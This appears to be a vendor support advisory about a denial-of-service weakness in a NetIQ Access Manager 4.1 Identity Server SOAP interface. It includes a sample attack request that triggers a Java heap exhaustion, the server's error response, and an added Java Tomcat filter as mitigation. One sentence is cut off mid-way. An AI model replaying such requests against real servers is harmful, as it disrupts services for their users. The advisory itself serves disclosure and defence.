DoS attack against Identity Server possible via open /nidp/service/ interface

  • 7016986
  • 13-Nov-2015
  • 02-Dec-2015

Environment

NetIQ Access Manager 4.1

Situation

The following URL on the Identity Server, "/nidp/service/IDSISCredentialProfile?wsdl", is open for everyone to discover. This file simply describes the web service interface that is used by the IDP/AGs for updating credential profile info. Although very few people use this outside of the Access Gateway, it is possible to upload a large file to this interface, which causes a stack dump. Repeating the exercise 1000s of times could generate

POST /nidp/services/IDSISCredentialProfile HTTP/1.1
Host: federation.novell.com
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
[...]
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn="urn:novell:credentialprofile:2005-03">
<soapenv:Header/>
<soapenv:Body>
<urn:Query xsi:type="xsd:anyType"><E>x</E></urn:Query>
</soapenv:Body>
</soapenv:Envelope>

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
[...]
<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body><soapenv:Fault><faultcode>soapenv:Server.generalException</faultcode>
<faultstring>java.lang.OutOfMemoryError: Java heap space; nested exception is:
java.lang.OutOfMemoryError: Java heap space</faultstring>
<detail><ns1:hostname xmlns:ns1="http://xml.apache.org/axis/">neilidp4.lab.novell.com</ns1:hostname></detail>
</soapenv:Fault></soapenv:Body></soapenv:Envelope>

Resolution

Fixed in NAM 4.2.

On 4.1, a Tomcat filter can be used to detect requests to the above URL and, if a request does not come from a recognised host, drop it or redirect it to another page.
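
One way to write the Tomcat filter described above, as an added example that is not NetIQ's code. The class name, the allowedHosts init parameter and the sample addresses are assumptions, as is deploying it through a filter mapping in the web.xml of the /nidp web application on a Tomcat that uses the javax.servlet API.

```java
import java.io.IOException;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Hypothetical filter: only recognised hosts may reach the web service interface. */
public class CredentialProfileServiceFilter implements Filter {
    private final Set<String> allowedHosts = new HashSet<String>();

    @Override
    public void init(FilterConfig config) throws ServletException {
        // Assumed init-param, e.g. "192.0.2.10,192.0.2.11" (constructed Access Gateway addresses).
        String param = config.getInitParameter("allowedHosts");
        if (param == null || param.trim().isEmpty()) {
            throw new ServletException("allowedHosts init-param is required"); // fail closed
        }
        for (String host : param.split(",")) {
            allowedHosts.add(host.trim());
        }
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        // Context-relative path, already decoded and normalised by the container.
        String info = request.getPathInfo();
        String path = request.getServletPath() + (info == null ? "" : info);
        // Both spellings appear on this page (/nidp/service/ and /nidp/services/), so guard both.
        boolean guarded = path.startsWith("/service/") || path.startsWith("/services/");
        // getRemoteAddr() is the TCP peer; behind a proxy or load balancer it is the proxy's address.
        if (guarded && !allowedHosts.contains(request.getRemoteAddr())) {
            // Reject before the SOAP body is read or parsed.
            ((HttpServletResponse) res).sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }
}
```

Because the filter answers with a 403 before touching the request body, an oversized upload from an unrecognised host never reaches the SOAP parser.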